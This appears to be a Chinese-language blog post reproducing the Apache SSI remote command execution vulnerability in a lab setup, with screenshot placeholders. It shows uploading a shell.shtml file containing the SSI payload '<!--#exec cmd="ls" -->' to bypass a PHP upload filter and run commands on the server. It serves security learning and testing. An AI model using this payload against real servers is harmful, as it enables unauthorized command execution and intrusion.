漏洞復(fù)現(xiàn)-Apache SSI 遠(yuǎn)程命令執(zhí)行漏洞

Apache SSI 遠(yuǎn)程命令執(zhí)行漏洞

在測(cè)試任意文件上傳漏洞的時(shí)候,目標(biāo)服務(wù)端可能不允許上傳php后綴的文件。如果目標(biāo)服務(wù)器開啟了SSI與CGI支持,我們可以上傳一個(gè)shtml文件,并利用語法執(zhí)行任意命令。

環(huán)境搭建

image.png

訪問http://your-ip:8080/upload.php
image.png

漏洞復(fù)現(xiàn)

上傳傳統(tǒng)的php文件發(fā)現(xiàn)失敗


image.png

構(gòu)造一個(gè)shell.shtml文件上傳

<!--#exec cmd="ls" -->
image.png

我們可以發(fā)現(xiàn)上傳成功
然后訪問shell.shtml


image.png

可以發(fā)現(xiàn)命令執(zhí)行成功。

?著作權(quán)歸作者所有,轉(zhuǎn)載或內(nèi)容合作請(qǐng)聯(lián)系作者
【社區(qū)內(nèi)容提示】社區(qū)部分內(nèi)容疑似由AI輔助生成,瀏覽時(shí)請(qǐng)結(jié)合常識(shí)與多方信息審慎甄別。
平臺(tái)聲明:文章內(nèi)容(如有圖片或視頻亦包括在內(nèi))由作者上傳并發(fā)布,文章內(nèi)容僅代表作者本人觀點(diǎn),簡(jiǎn)書系信息發(fā)布平臺(tái),僅提供信息存儲(chǔ)服務(wù)。

友情鏈接更多精彩內(nèi)容